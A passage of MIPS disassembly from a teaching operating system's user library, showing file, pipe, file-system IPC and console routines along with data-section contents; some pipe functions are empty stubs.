402674: 8fb10014 lw s1,20(sp)
402678: 8fb00010 lw s0,16(sp)
40267c: 03e00008 jr ra
402680: 27bd0028 addiu sp,sp,40
00402684 <file_stat>:
402684: 27bdffe0 addiu sp,sp,-32
402688: afbf0018 sw ra,24(sp)
40268c: afb10014 sw s1,20(sp)
402690: afb00010 sw s0,16(sp)
402694: 00808021 move s0,a0
402698: 00a08821 move s1,a1
40269c: 00a02021 move a0,a1
4026a0: 0c100647 jal 40191c <strcpy>
4026a4: 26050010 addiu a1,s0,16
4026a8: 8e020090 lw v0,144(s0)
4026ac: 00000000 nop
4026b0: ae220080 sw v0,128(s1)
4026b4: 8e020094 lw v0,148(s0)
4026b8: 00000000 nop
4026bc: 38420001 xori v0,v0,0x1
4026c0: 2c420001 sltiu v0,v0,1
4026c4: ae220084 sw v0,132(s1)
4026c8: 00001021 move v0,zero
4026cc: 8fbf0018 lw ra,24(sp)
4026d0: 8fb10014 lw s1,20(sp)
4026d4: 8fb00010 lw s0,16(sp)
4026d8: 03e00008 jr ra
4026dc: 27bd0020 addiu sp,sp,32
004026e0 <ftruncate>:
4026e0: 27bdffb8 addiu sp,sp,-72
4026e4: afbf0044 sw ra,68(sp)
4026e8: afbe0040 sw s8,64(sp)
4026ec: afb7003c sw s7,60(sp)
4026f0: afb60038 sw s6,56(sp)
4026f4: afb50034 sw s5,52(sp)
4026f8: afb40030 sw s4,48(sp)
4026fc: afb3002c sw s3,44(sp)
402700: afb20028 sw s2,40(sp)
402704: afb10024 sw s1,36(sp)
402708: afb00020 sw s0,32(sp)
40270c: 3c020040 lui v0,0x40
402710: 0045102b sltu v0,v0,a1
402714: 10400003 beqz v0,402724 <ftruncate+0x44>
402718: 00a08821 move s1,a1
40271c: 10000049 b 402844 <ftruncate+0x164>
402720: 2410fff9 li s0,-7
402724: 0c1006e6 jal 401b98 <fd_lookup>
402728: 27a50018 addiu a1,sp,24
40272c: 04400045 bltz v0,402844 <ftruncate+0x164>
402730: 00408021 move s0,v0
402734: 8fa50018 lw a1,24(sp)
402738: 00000000 nop
40273c: 8ca20000 lw v0,0(a1)
402740: 3c030040 lui v1,0x40
402744: 8c637620 lw v1,30240(v1)
402748: 00000000 nop
40274c: 10430008 beq v0,v1,402770 <ftruncate+0x90>
402750: 2410fffd li s0,-3
402754: 1000003c b 402848 <ftruncate+0x168>
402758: 02001021 move v0,s0
40275c: 02602021 move a0,s3
402760: 0c100b2a jal 402ca8 <fsipc_set_size>
402764: 02e02821 move a1,s7
402768: 10000037 b 402848 <ftruncate+0x168>
40276c: 02001021 move v0,s0
402770: 8cb3000c lw s3,12(a1)
402774: 8cb70090 lw s7,144(a1)
402778: 02602021 move a0,s3
40277c: 0c100b2a jal 402ca8 <fsipc_set_size>
402780: 02202821 move a1,s1
402784: 0440002f bltz v0,402844 <ftruncate+0x164>
402788: 00408021 move s0,v0
40278c: 8fa40018 lw a0,24(sp)
402790: 0c1006fa jal 401be8 <fd2data>
402794: 26f60fff addiu s6,s7,4095
402798: 0040f021 move s8,v0
40279c: 2402f000 li v0,-4096
4027a0: 02c29024 and s2,s6,v0
4027a4: 26350fff addiu s5,s1,4095
4027a8: 02a2a024 and s4,s5,v0
4027ac: 0254102b sltu v0,s2,s4
4027b0: 1040000d beqz v0,4027e8 <ftruncate+0x108>
4027b4: 2402f000 li v0,-4096
4027b8: 025e8821 addu s1,s2,s8
4027bc: 02602021 move a0,s3
4027c0: 02402821 move a1,s2
4027c4: 0c100b0c jal 402c30 <fsipc_map>
4027c8: 02203021 move a2,s1
4027cc: 0440ffe3 bltz v0,40275c <ftruncate+0x7c>
4027d0: 00408021 move s0,v0
4027d4: 26521000 addiu s2,s2,4096
4027d8: 0254102b sltu v0,s2,s4
4027dc: 1440fff7 bnez v0,4027bc <ftruncate+0xdc>
4027e0: 26311000 addiu s1,s1,4096
4027e4: 2402f000 li v0,-4096
4027e8: 02a28024 and s0,s5,v0
4027ec: 02c29024 and s2,s6,v0
4027f0: 0212102b sltu v0,s0,s2
4027f4: 10400012 beqz v0,402840 <ftruncate+0x160>
4027f8: 03d08821 addu s1,s8,s0
4027fc: 00002021 move a0,zero
402800: 0c100591 jal 401644 <syscall_mem_unmap>
402804: 02202821 move a1,s1
402808: 0441000a bgez v0,402834 <ftruncate+0x154>
40280c: 26101000 addiu s0,s0,4096
402810: 2610f000 addiu s0,s0,-4096
402814: afa20010 sw v0,16(sp)
402818: 3c040040 lui a0,0x40
40281c: 24847564 addiu a0,a0,30052
402820: 24050113 li a1,275
402824: 3c060040 lui a2,0x40
402828: 24c6756c addiu a2,a2,30060
40282c: 0c100096 jal 400258 <_user_panic>
402830: 02203821 move a3,s1
402834: 0212102b sltu v0,s0,s2
402838: 1440fff0 bnez v0,4027fc <ftruncate+0x11c>
40283c: 26311000 addiu s1,s1,4096
402840: 00008021 move s0,zero
402844: 02001021 move v0,s0
402848: 8fbf0044 lw ra,68(sp)
40284c: 8fbe0040 lw s8,64(sp)
402850: 8fb7003c lw s7,60(sp)
402854: 8fb60038 lw s6,56(sp)
402858: 8fb50034 lw s5,52(sp)
40285c: 8fb40030 lw s4,48(sp)
402860: 8fb3002c lw s3,44(sp)
402864: 8fb20028 lw s2,40(sp)
402868: 8fb10024 lw s1,36(sp)
40286c: 8fb00020 lw s0,32(sp)
402870: 03e00008 jr ra
402874: 27bd0048 addiu sp,sp,72
00402878 <remove>:
402878: 27bdffe8 addiu sp,sp,-24
40287c: afbf0010 sw ra,16(sp)
402880: 0c100b55 jal 402d54 <fsipc_remove>
402884: 00000000 nop
402888: 8fbf0010 lw ra,16(sp)
40288c: 00000000 nop
402890: 03e00008 jr ra
402894: 27bd0018 addiu sp,sp,24
00402898 <sync>:
402898: 27bdffe8 addiu sp,sp,-24
40289c: afbf0010 sw ra,16(sp)
4028a0: 0c100b6d jal 402db4 <fsipc_sync>
4028a4: 00000000 nop
4028a8: 8fbf0010 lw ra,16(sp)
4028ac: 00000000 nop
4028b0: 03e00008 jr ra
4028b4: 27bd0018 addiu sp,sp,24
...
004028c0 <pipe>:
4028c0: 27bdffd0 addiu sp,sp,-48
4028c4: afbf002c sw ra,44(sp)
4028c8: afb20028 sw s2,40(sp)
4028cc: afb10024 sw s1,36(sp)
4028d0: afb00020 sw s0,32(sp)
4028d4: 00809021 move s2,a0
4028d8: 0c1006bc jal 401af0 <fd_alloc>
4028dc: 27a40018 addiu a0,sp,24
4028e0: 04400056 bltz v0,402a3c <pipe+0x17c>
4028e4: 00408021 move s0,v0
4028e8: 00002021 move a0,zero
4028ec: 8fa50018 lw a1,24(sp)
4028f0: 0c100570 jal 4015c0 <syscall_mem_alloc>
4028f4: 24060604 li a2,1540
4028f8: 04400050 bltz v0,402a3c <pipe+0x17c>
4028fc: 00408021 move s0,v0
402900: 0c1006bc jal 401af0 <fd_alloc>
402904: 27a4001c addiu a0,sp,28
402908: 04400049 bltz v0,402a30 <pipe+0x170>
40290c: 00408021 move s0,v0
402910: 00002021 move a0,zero
402914: 8fa5001c lw a1,28(sp)
402918: 0c100570 jal 4015c0 <syscall_mem_alloc>
40291c: 24060604 li a2,1540
402920: 04400043 bltz v0,402a30 <pipe+0x170>
402924: 00408021 move s0,v0
402928: 8fa40018 lw a0,24(sp)
40292c: 0c1006fa jal 401be8 <fd2data>
402930: 00000000 nop
402934: 00408821 move s1,v0
402938: 00002021 move a0,zero
40293c: 00402821 move a1,v0
402940: 0c100570 jal 4015c0 <syscall_mem_alloc>
402944: 24060604 li a2,1540
402948: 04400036 bltz v0,402a24 <pipe+0x164>
40294c: 00408021 move s0,v0
402950: 8fa4001c lw a0,28(sp)
402954: 0c1006fa jal 401be8 <fd2data>
402958: 00000000 nop
40295c: 24030604 li v1,1540
402960: afa30010 sw v1,16(sp)
402964: 00002021 move a0,zero
402968: 02202821 move a1,s1
40296c: 00003021 move a2,zero
402970: 0c10057f jal 4015fc <syscall_mem_map>
402974: 00403821 move a3,v0
402978: 04400027 bltz v0,402a18 <pipe+0x158>
40297c: 00408021 move s0,v0
402980: 3c040040 lui a0,0x40
402984: 8c83763c lw v1,30268(a0)
402988: 8fa20018 lw v0,24(sp)
40298c: 00000000 nop
402990: ac430000 sw v1,0(v0)
402994: 8fa20018 lw v0,24(sp)
402998: 00000000 nop
40299c: ac400008 sw zero,8(v0)
4029a0: 8c83763c lw v1,30268(a0)
4029a4: 8fa2001c lw v0,28(sp)
4029a8: 00000000 nop
4029ac: ac430000 sw v1,0(v0)
4029b0: 24030001 li v1,1
4029b4: 8fa2001c lw v0,28(sp)
4029b8: 00000000 nop
4029bc: ac430008 sw v1,8(v0)
4029c0: 3c020041 lui v0,0x41
4029c4: 8c458004 lw a1,-32764(v0)
4029c8: 00111302 srl v0,s1,0xc
4029cc: 00021080 sll v0,v0,0x2
4029d0: 3c030040 lui v1,0x40
4029d4: 8c636008 lw v1,24584(v1)
4029d8: 00000000 nop
4029dc: 00431021 addu v0,v0,v1
4029e0: 8c460000 lw a2,0(v0)
4029e4: 3c040040 lui a0,0x40
4029e8: 8ca500a4 lw a1,164(a1)
4029ec: 0c100086 jal 400218 <writef>
4029f0: 2484759c addiu a0,a0,30108
4029f4: 8fa40018 lw a0,24(sp)
4029f8: 0c100705 jal 401c14 <fd2num>
4029fc: 00008021 move s0,zero
402a00: ae420000 sw v0,0(s2)
402a04: 8fa4001c lw a0,28(sp)
402a08: 0c100705 jal 401c14 <fd2num>
402a0c: 00000000 nop
402a10: 1000000a b 402a3c <pipe+0x17c>
402a14: ae420004 sw v0,4(s2)
402a18: 00002021 move a0,zero
402a1c: 0c100591 jal 401644 <syscall_mem_unmap>
402a20: 02202821 move a1,s1
402a24: 8fa5001c lw a1,28(sp)
402a28: 0c100591 jal 401644 <syscall_mem_unmap>
402a2c: 00002021 move a0,zero
402a30: 8fa50018 lw a1,24(sp)
402a34: 0c100591 jal 401644 <syscall_mem_unmap>
402a38: 00002021 move a0,zero
402a3c: 02001021 move v0,s0
402a40: 8fbf002c lw ra,44(sp)
402a44: 8fb20028 lw s2,40(sp)
402a48: 8fb10024 lw s1,36(sp)
402a4c: 8fb00020 lw s0,32(sp)
402a50: 03e00008 jr ra
402a54: 27bd0030 addiu sp,sp,48
00402a58 <_pipeisclosed>:
402a58: 03e00008 jr ra
402a5c: 00000000 nop
00402a60 <pipeisclosed>:
402a60: 27bdffe0 addiu sp,sp,-32
402a64: afbf0018 sw ra,24(sp)
402a68: 0c1006e6 jal 401b98 <fd_lookup>
402a6c: 27a50010 addiu a1,sp,16
402a70: 04400007 bltz v0,402a90 <pipeisclosed+0x30>
402a74: 00000000 nop
402a78: 8fa40010 lw a0,16(sp)
402a7c: 0c1006fa jal 401be8 <fd2data>
402a80: 00000000 nop
402a84: 8fa40010 lw a0,16(sp)
402a88: 0c100a96 jal 402a58 <_pipeisclosed>
402a8c: 00402821 move a1,v0
402a90: 8fbf0018 lw ra,24(sp)
402a94: 00000000 nop
402a98: 03e00008 jr ra
402a9c: 27bd0020 addiu sp,sp,32
00402aa0 <piperead>:
402aa0: 03e00008 jr ra
402aa4: 00000000 nop
00402aa8 <pipewrite>:
402aa8: 03e00008 jr ra
402aac: 00c01021 move v0,a2
00402ab0 <pipestat>:
402ab0: 27bdffe0 addiu sp,sp,-32
402ab4: afbf0018 sw ra,24(sp)
402ab8: afb10014 sw s1,20(sp)
402abc: afb00010 sw s0,16(sp)
402ac0: 0c1006fa jal 401be8 <fd2data>
402ac4: 00a08021 move s0,a1
402ac8: 00408821 move s1,v0
402acc: 02002021 move a0,s0
402ad0: 3c050040 lui a1,0x40
402ad4: 0c100647 jal 40191c <strcpy>
402ad8: 24a575b0 addiu a1,a1,30128
402adc: 8e220004 lw v0,4(s1)
402ae0: 8e230000 lw v1,0(s1)
402ae4: 00000000 nop
402ae8: 00431023 subu v0,v0,v1
402aec: ae020080 sw v0,128(s0)
402af0: ae000084 sw zero,132(s0)
402af4: 3c020040 lui v0,0x40
402af8: 2442763c addiu v0,v0,30268
402afc: ae020088 sw v0,136(s0)
402b00: 00001021 move v0,zero
402b04: 8fbf0018 lw ra,24(sp)
402b08: 8fb10014 lw s1,20(sp)
402b0c: 8fb00010 lw s0,16(sp)
402b10: 03e00008 jr ra
402b14: 27bd0020 addiu sp,sp,32
00402b18 <pipeclose>:
402b18: 27bdffe8 addiu sp,sp,-24
402b1c: afbf0010 sw ra,16(sp)
402b20: 0c1006fa jal 401be8 <fd2data>
402b24: 00000000 nop
402b28: 00002021 move a0,zero
402b2c: 0c100591 jal 401644 <syscall_mem_unmap>
402b30: 00402821 move a1,v0
402b34: 00001021 move v0,zero
402b38: 8fbf0010 lw ra,16(sp)
402b3c: 00000000 nop
402b40: 03e00008 jr ra
402b44: 27bd0018 addiu sp,sp,24
...
00402b50 <fsipc>:
402b50: 27bdffd8 addiu sp,sp,-40
402b54: afbf0020 sw ra,32(sp)
402b58: afb1001c sw s1,28(sp)
402b5c: afb00018 sw s0,24(sp)
402b60: 00801821 move v1,a0
402b64: 00a04021 move t0,a1
402b68: 00c08021 move s0,a2
402b6c: 00e08821 move s1,a3
402b70: 3c020040 lui v0,0x40
402b74: 8c426000 lw v0,24576(v0)
402b78: 00000000 nop
402b7c: 8c44018c lw a0,396(v0)
402b80: 00602821 move a1,v1
402b84: 01003021 move a2,t0
402b88: 0c1005f4 jal 4017d0 <ipc_send>
402b8c: 24070600 li a3,1536
402b90: 27a40010 addiu a0,sp,16
402b94: 02002821 move a1,s0
402b98: 0c10061a jal 401868 <ipc_recv>
402b9c: 02203021 move a2,s1
402ba0: 8fbf0020 lw ra,32(sp)
402ba4: 8fb1001c lw s1,28(sp)
402ba8: 8fb00018 lw s0,24(sp)
402bac: 03e00008 jr ra
402bb0: 27bd0028 addiu sp,sp,40
00402bb4 <fsipc_open>:
402bb4: 27bdffd0 addiu sp,sp,-48
402bb8: afbf0028 sw ra,40(sp)
402bbc: afb30024 sw s3,36(sp)
402bc0: afb20020 sw s2,32(sp)
402bc4: afb1001c sw s1,28(sp)
402bc8: afb00018 sw s0,24(sp)
402bcc: 00808821 move s1,a0
402bd0: 00a09021 move s2,a1
402bd4: 00c09821 move s3,a2
402bd8: 3c020040 lui v0,0x40
402bdc: 0c10063c jal 4018f0 <strlen>
402be0: 24504000 addiu s0,v0,16384
402be4: 28420400 slti v0,v0,1024
402be8: 1040000a beqz v0,402c14 <fsipc_open+0x60>
402bec: 2402fff6 li v0,-10
402bf0: 02002021 move a0,s0
402bf4: 0c100647 jal 40191c <strcpy>
402bf8: 02202821 move a1,s1
402bfc: ae120400 sw s2,1024(s0)
402c00: 24040001 li a0,1
402c04: 02002821 move a1,s0
402c08: 02603021 move a2,s3
402c0c: 0c100ad4 jal 402b50 <fsipc>
402c10: 27a70010 addiu a3,sp,16
402c14: 8fbf0028 lw ra,40(sp)
402c18: 8fb30024 lw s3,36(sp)
402c1c: 8fb20020 lw s2,32(sp)
402c20: 8fb1001c lw s1,28(sp)
402c24: 8fb00018 lw s0,24(sp)
402c28: 03e00008 jr ra
402c2c: 27bd0030 addiu sp,sp,48
00402c30 <fsipc_map>:
402c30: 27bdffd8 addiu sp,sp,-40
402c34: afbf0024 sw ra,36(sp)
402c38: afb00020 sw s0,32(sp)
402c3c: 00c08021 move s0,a2
402c40: 3c020040 lui v0,0x40
402c44: 24434000 addiu v1,v0,16384
402c48: ac444000 sw a0,16384(v0)
402c4c: ac650004 sw a1,4(v1)
402c50: 24040002 li a0,2
402c54: 00602821 move a1,v1
402c58: 0c100ad4 jal 402b50 <fsipc>
402c5c: 27a70018 addiu a3,sp,24
402c60: 0440000d bltz v0,402c98 <fsipc_map+0x68>
402c64: 24030200 li v1,512
402c68: 8fa70018 lw a3,24(sp)
402c6c: 2402fbfb li v0,-1029
402c70: 00e21024 and v0,a3,v0
402c74: 10430008 beq v0,v1,402c98 <fsipc_map+0x68>
402c78: 00001021 move v0,zero
402c7c: afb00010 sw s0,16(sp)
402c80: 3c040040 lui a0,0x40
402c84: 248475b8 addiu a0,a0,30136
402c88: 2405004a li a1,74
402c8c: 3c060040 lui a2,0x40
402c90: 0c100096 jal 400258 <_user_panic>
402c94: 24c675c0 addiu a2,a2,30144
402c98: 8fbf0024 lw ra,36(sp)
402c9c: 8fb00020 lw s0,32(sp)
402ca0: 03e00008 jr ra
402ca4: 27bd0028 addiu sp,sp,40
00402ca8 <fsipc_set_size>:
402ca8: 27bdffe8 addiu sp,sp,-24
402cac: afbf0010 sw ra,16(sp)
402cb0: 3c020040 lui v0,0x40
402cb4: 24434000 addiu v1,v0,16384
402cb8: ac444000 sw a0,16384(v0)
402cbc: ac650004 sw a1,4(v1)
402cc0: 24040003 li a0,3
402cc4: 00602821 move a1,v1
402cc8: 00003021 move a2,zero
402ccc: 0c100ad4 jal 402b50 <fsipc>
402cd0: 00003821 move a3,zero
402cd4: 8fbf0010 lw ra,16(sp)
402cd8: 00000000 nop
402cdc: 03e00008 jr ra
402ce0: 27bd0018 addiu sp,sp,24
00402ce4 <fsipc_close>:
402ce4: 27bdffe8 addiu sp,sp,-24
402ce8: afbf0010 sw ra,16(sp)
402cec: 3c050040 lui a1,0x40
402cf0: aca44000 sw a0,16384(a1)
402cf4: 24040004 li a0,4
402cf8: 24a54000 addiu a1,a1,16384
402cfc: 00003021 move a2,zero
402d00: 0c100ad4 jal 402b50 <fsipc>
402d04: 00003821 move a3,zero
402d08: 8fbf0010 lw ra,16(sp)
402d0c: 00000000 nop
402d10: 03e00008 jr ra
402d14: 27bd0018 addiu sp,sp,24
00402d18 <fsipc_dirty>:
402d18: 27bdffe8 addiu sp,sp,-24
402d1c: afbf0010 sw ra,16(sp)
402d20: 3c020040 lui v0,0x40
402d24: 24434000 addiu v1,v0,16384
402d28: ac444000 sw a0,16384(v0)
402d2c: ac650004 sw a1,4(v1)
402d30: 24040005 li a0,5
402d34: 00602821 move a1,v1
402d38: 00003021 move a2,zero
402d3c: 0c100ad4 jal 402b50 <fsipc>
402d40: 00003821 move a3,zero
402d44: 8fbf0010 lw ra,16(sp)
402d48: 00000000 nop
402d4c: 03e00008 jr ra
402d50: 27bd0018 addiu sp,sp,24
00402d54 <fsipc_remove>:
402d54: 27bdffe0 addiu sp,sp,-32
402d58: afbf0018 sw ra,24(sp)
402d5c: afb10014 sw s1,20(sp)
402d60: afb00010 sw s0,16(sp)
402d64: 00808821 move s1,a0
402d68: 3c020040 lui v0,0x40
402d6c: 0c10063c jal 4018f0 <strlen>
402d70: 24504000 addiu s0,v0,16384
402d74: 28420400 slti v0,v0,1024
402d78: 10400009 beqz v0,402da0 <fsipc_remove+0x4c>
402d7c: 2402fff6 li v0,-10
402d80: 02002021 move a0,s0
402d84: 0c100647 jal 40191c <strcpy>
402d88: 02202821 move a1,s1
402d8c: 24040006 li a0,6
402d90: 02002821 move a1,s0
402d94: 00003021 move a2,zero
402d98: 0c100ad4 jal 402b50 <fsipc>
402d9c: 00003821 move a3,zero
402da0: 8fbf0018 lw ra,24(sp)
402da4: 8fb10014 lw s1,20(sp)
402da8: 8fb00010 lw s0,16(sp)
402dac: 03e00008 jr ra
402db0: 27bd0020 addiu sp,sp,32
00402db4 <fsipc_sync>:
402db4: 27bdffe8 addiu sp,sp,-24
402db8: afbf0010 sw ra,16(sp)
402dbc: 24040007 li a0,7
402dc0: 3c050040 lui a1,0x40
402dc4: 24a54000 addiu a1,a1,16384
402dc8: 00003021 move a2,zero
402dcc: 0c100ad4 jal 402b50 <fsipc>
402dd0: 00003821 move a3,zero
402dd4: 8fbf0010 lw ra,16(sp)
402dd8: 00000000 nop
402ddc: 03e00008 jr ra
402de0: 27bd0018 addiu sp,sp,24
...
00402df0 <iscons>:
402df0: 27bdffe0 addiu sp,sp,-32
402df4: afbf0018 sw ra,24(sp)
402df8: 0c1006e6 jal 401b98 <fd_lookup>
402dfc: 27a50010 addiu a1,sp,16
402e00: 04400008 bltz v0,402e24 <iscons+0x34>
402e04: 3c030040 lui v1,0x40
402e08: 8fa20010 lw v0,16(sp)
402e0c: 00000000 nop
402e10: 8c420000 lw v0,0(v0)
402e14: 8c637658 lw v1,30296(v1)
402e18: 00000000 nop
402e1c: 00431026 xor v0,v0,v1
402e20: 2c420001 sltiu v0,v0,1
402e24: 8fbf0018 lw ra,24(sp)
402e28: 00000000 nop
402e2c: 03e00008 jr ra
402e30: 27bd0020 addiu sp,sp,32
00402e34 <opencons>:
402e34: 27bdffe0 addiu sp,sp,-32
402e38: afbf0018 sw ra,24(sp)
402e3c: 0c1006bc jal 401af0 <fd_alloc>
402e40: 27a40010 addiu a0,sp,16
402e44: 04400012 bltz v0,402e90 <opencons+0x5c>
402e48: 00002021 move a0,zero
402e4c: 8fa50010 lw a1,16(sp)
402e50: 0c100570 jal 4015c0 <syscall_mem_alloc>
402e54: 24060604 li a2,1540
402e58: 0440000d bltz v0,402e90 <opencons+0x5c>
402e5c: 00000000 nop
402e60: 3c020040 lui v0,0x40
402e64: 8c437658 lw v1,30296(v0)
402e68: 8fa20010 lw v0,16(sp)
402e6c: 00000000 nop
402e70: ac430000 sw v1,0(v0)
402e74: 24030002 li v1,2
402e78: 8fa20010 lw v0,16(sp)
402e7c: 00000000 nop
402e80: ac430008 sw v1,8(v0)
402e84: 8fa40010 lw a0,16(sp)
402e88: 0c100705 jal 401c14 <fd2num>
402e8c: 00000000 nop
402e90: 8fbf0018 lw ra,24(sp)
402e94: 00000000 nop
402e98: 03e00008 jr ra
402e9c: 27bd0020 addiu sp,sp,32
00402ea0 <cons_read>:
402ea0: 27bdffe0 addiu sp,sp,-32
402ea4: afbf0018 sw ra,24(sp)
402ea8: afb10014 sw s1,20(sp)
402eac: afb00010 sw s0,16(sp)
402eb0: 14c00005 bnez a2,402ec8 <cons_read+0x28>
402eb4: 00a08821 move s1,a1
402eb8: 1000001d b 402f30 <cons_read+0x90>
402ebc: 00008021 move s0,zero
402ec0: 0c100547 jal 40151c <syscall_yield>
402ec4: 00000000 nop
402ec8: 0c1005e5 jal 401794 <syscall_cgetc>
402ecc: 00000000 nop
402ed0: 1040fffb beqz v0,402ec0 <cons_read+0x20>
402ed4: 00408021 move s0,v0
402ed8: 2402000d li v0,13
402edc: 12020009 beq s0,v0,402f04 <cons_read+0x64>
402ee0: 3c040040 lui a0,0x40
402ee4: 3c040040 lui a0,0x40
402ee8: 24847600 addiu a0,a0,30208
402eec: 0c100086 jal 400218 <writef>
402ef0: 02002821 move a1,s0
402ef4: 06010007 bgez s0,402f14 <cons_read+0x74>
402ef8: 02001021 move v0,s0
402efc: 1000000d b 402f34 <cons_read+0x94>
402f00: 00000000 nop
402f04: 0c100086 jal 400218 <writef>
402f08: 2484752c addiu a0,a0,29996
402f0c: 10000005 b 402f24 <cons_read+0x84>
402f10: a2300000 sb s0,0(s1)
402f14: 24020004 li v0,4
402f18: 12020004 beq s0,v0,402f2c <cons_read+0x8c>
402f1c: 00000000 nop
402f20: a2300000 sb s0,0(s1)
402f24: 10000002 b 402f30 <cons_read+0x90>
402f28: 24100001 li s0,1
402f2c: 00008021 move s0,zero
402f30: 02001021 move v0,s0
402f34: 8fbf0018 lw ra,24(sp)
402f38: 8fb10014 lw s1,20(sp)
402f3c: 8fb00010 lw s0,16(sp)
402f40: 03e00008 jr ra
402f44: 27bd0020 addiu sp,sp,32
00402f48 <cons_write>:
402f48: 27bdff50 addiu sp,sp,-176
402f4c: afbf00a8 sw ra,168(sp)
402f50: afb500a4 sw s5,164(sp)
402f54: afb400a0 sw s4,160(sp)
402f58: afb3009c sw s3,156(sp)
402f5c: afb20098 sw s2,152(sp)
402f60: afb10094 sw s1,148(sp)
402f64: afb00090 sw s0,144(sp)
402f68: 00a0a821 move s5,a1
402f6c: 14c00003 bnez a2,402f7c <cons_write+0x34>
402f70: 00c08821 move s1,a2
402f74: 10000016 b 402fd0 <cons_write+0x88>
402f78: 00009021 move s2,zero
402f7c: 00001821 move v1,zero
402f80: 00009021 move s2,zero
402f84: 27b30010 addiu s3,sp,16
402f88: 3c140040 lui s4,0x40
402f8c: 02238023 subu s0,s1,v1
402f90: 2e020080 sltiu v0,s0,128
402f94: 14400002 bnez v0,402fa0 <cons_write+0x58>
402f98: 02a32021 addu a0,s5,v1
402f9c: 2410007f li s0,127
402fa0: 27a50010 addiu a1,sp,16
402fa4: 0c100322 jal 400c88 <user_bcopy>
402fa8: 02003021 move a2,s0
402fac: 02701021 addu v0,s3,s0
402fb0: a0400000 sb zero,0(v0)
402fb4: 26847604 addiu a0,s4,30212
402fb8: 0c100086 jal 400218 <writef>
402fbc: 02602821 move a1,s3
402fc0: 02509021 addu s2,s2,s0
402fc4: 0251102b sltu v0,s2,s1
402fc8: 1440fff0 bnez v0,402f8c <cons_write+0x44>
402fcc: 02401821 move v1,s2
402fd0: 02401021 move v0,s2
402fd4: 8fbf00a8 lw ra,168(sp)
402fd8: 8fb500a4 lw s5,164(sp)
402fdc: 8fb400a0 lw s4,160(sp)
402fe0: 8fb3009c lw s3,156(sp)
402fe4: 8fb20098 lw s2,152(sp)
402fe8: 8fb10094 lw s1,148(sp)
402fec: 8fb00090 lw s0,144(sp)
402ff0: 03e00008 jr ra
402ff4: 27bd00b0 addiu sp,sp,176
00402ff8 <cons_close>:
402ff8: 03e00008 jr ra
402ffc: 00001021 move v0,zero
00403000 <cons_stat>:
403000: 27bdffe8 addiu sp,sp,-24
403004: afbf0010 sw ra,16(sp)
403008: 00a02021 move a0,a1
40300c: 3c050040 lui a1,0x40
403010: 0c100647 jal 40191c <strcpy>
403014: 24a57608 addiu a1,a1,30216
403018: 00001021 move v0,zero
40301c: 8fbf0010 lw ra,16(sp)
403020: 00000000 nop
403024: 03e00008 jr ra
403028: 27bd0018 addiu sp,sp,24
40302c: 00000000 nop
00403030 <user_out2string>:
403030: 24020001 li v0,1
403034: 14c2000d bne a2,v0,40306c <user_out2string+0x3c>
403038: 00000000 nop
40303c: 80a20000 lb v0,0(a1)
403040: 00000000 nop
403044: 1040000b beqz v0,403074 <user_out2string+0x44>
403048: 00003821 move a3,zero
40304c: 00871021 addu v0,a0,a3
403050: 00a71821 addu v1,a1,a3
403054: 90630000 lbu v1,0(v1)
403058: 24e70001 addiu a3,a3,1
40305c: 10c70005 beq a2,a3,403074 <user_out2string+0x44>
403060: a0430000 sb v1,0(v0)
403064: 1000fffa b 403050 <user_out2string+0x20>
403068: 00871021 addu v0,a0,a3
40306c: 1cc0fff7 bgtz a2,40304c <user_out2string+0x1c>
403070: 00003821 move a3,zero
403074: 03e00008 jr ra
403078: 00000000 nop
0040307c <fwritef>:
40307c: 27bdfdd8 addiu sp,sp,-552
403080: afbf0220 sw ra,544(sp)
403084: afb1021c sw s1,540(sp)
403088: afb00218 sw s0,536(sp)
40308c: 00808821 move s1,a0
403090: afa60230 sw a2,560(sp)
403094: afa70234 sw a3,564(sp)
403098: 00a08021 move s0,a1
40309c: 27a20230 addiu v0,sp,560
4030a0: afa20210 sw v0,528(sp)
4030a4: 27a40010 addiu a0,sp,16
4030a8: 0c100344 jal 400d10 <user_bzero>
4030ac: 24050200 li a1,512
4030b0: 3c040040 lui a0,0x40
4030b4: 24843030 addiu a0,a0,12336
4030b8: 27a50010 addiu a1,sp,16
4030bc: 8fa70210 lw a3,528(sp)
4030c0: 0c1000b0 jal 4002c0 <user_lp_Print>
4030c4: 02003021 move a2,s0
4030c8: 0c10063c jal 4018f0 <strlen>
4030cc: 27a40010 addiu a0,sp,16
4030d0: 02202021 move a0,s1
4030d4: 27a50010 addiu a1,sp,16
4030d8: 0c1007fe jal 401ff8 <write>
4030dc: 00403021 move a2,v0
4030e0: 8fbf0220 lw ra,544(sp)
4030e4: 8fb1021c lw s1,540(sp)
4030e8: 8fb00218 lw s0,536(sp)
4030ec: 03e00008 jr ra
4030f0: 27bd0228 addiu sp,sp,552
...
Disassembly of section .reginfo:
00403100 <.reginfo>:
403100: f7fffffe 0xf7fffffe
...
Disassembly of section .data:
00404000 <fsipcbuf>:
...
00405000 <fdtab>:
...
00406000 <envs>:
406000: 7f400000 0x7f400000
00406004 <pages>:
406004: 7f800000 0x7f800000
00406008 <vpt>:
406008: 7fc00000 0x7fc00000
0040600c <vpd>:
40600c: 7fdff000 0x7fdff000
00406010 <__pgfault_handler>:
...
00407000 <user_theFatalMsg>:
407000: 66617461 0x66617461
407004: 6c206572 0x6c206572
407008: 726f7220 0x726f7220
40700c: 696e2075 0x696e2075
407010: 7365725f 0x7365725f
407014: 6c705f50 0x6c705f50
407018: 72696e74 0x72696e74
40701c: 21000000 addi zero,t0,0
407020: 00000000 nop
407024: 00400820 add at,v0,zero
407028: 00400828 0x400828
40702c: 00400828 0x400828
407030: 00400828 0x400828
407034: 00400828 0x400828
407038: 00400828 0x400828
40703c: 00400828 0x400828
407040: 00400828 0x400828
407044: 00400828 0x400828
407048: 00400828 0x400828
40704c: 00400828 0x400828
407050: 00400828 0x400828
407054: 00400828 0x400828
407058: 00400828 0x400828
40705c: 00400828 0x400828
407060: 00400828 0x400828
407064: 00400828 0x400828
407068: 00400828 0x400828
40706c: 00400828 0x400828
407070: 00400828 0x400828
407074: 00400828 0x400828
407078: 00400828 0x400828
40707c: 00400828 0x400828
407080: 00400828 0x400828
407084: 00400828 0x400828
407088: 00400828 0x400828
40708c: 00400828 0x400828
407090: 00400828 0x400828
407094: 00400828 0x400828
407098: 00400828 0x400828
40709c: 00400828 0x400828
4070a0: 00400828 0x400828
4070a4: 00400828 0x400828
4070a8: 00400828 0x400828
4070ac: 00400828 0x400828
4070b0: 00400828 0x400828
4070b4: 00400828 0x400828
4070b8: 00400828 0x400828
4070bc: 00400828 0x400828
4070c0: 00400828 0x400828
4070c4: 00400828 0x400828
4070c8: 00400828 0x400828
